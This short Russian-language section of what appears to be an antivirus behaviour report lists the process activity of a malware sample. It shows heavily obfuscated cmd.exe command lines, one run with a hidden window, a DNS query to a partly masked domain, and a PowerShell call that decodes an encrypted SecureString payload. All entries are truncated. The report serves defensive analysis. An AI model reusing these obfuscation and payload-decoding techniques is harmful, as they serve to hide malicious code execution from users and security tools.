Техническая информация
- '<SYSTEM32>\cmd.exe' kAtsltaELT KSzcwwrQJvrGiraHqPcsUitR rISDVJiFTcrDf & %C^om^S^pEc% %C^om^S^pEc% /V /c set %laawjGGdEKbnFVf%=zAcpUNIt&&set %UWBNAfvViOTzu%=p&&set %KETNpzOQEs...
- DNS ASK kr#######asndasidhnjqwewq.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "( [rUNTime.iNteROPSeRvICES.mArsHAL]::([rUnTime.InTeRopSErVIces.mArShaL].GetMEmbeRS()[3].nAmE).iNvokE( [rUNtime.iNTEropserViCES.MARSHal]::sECUreStrInGTObstR($('76492d1116743f0423413b16050a5345M...
- '<SYSTEM32>\cmd.exe' kAtsltaELT KSzcwwrQJvrGiraHqPcsUitR rISDVJiFTcrDf & %C^om^S^pEc% %C^om^S^pEc% /V /c set %laawjGGdEKbnFVf%=zAcpUNIt&&set %UWBNAfvViOTzu%=p&&set %KETNpzOQEs... (со скрытым окном)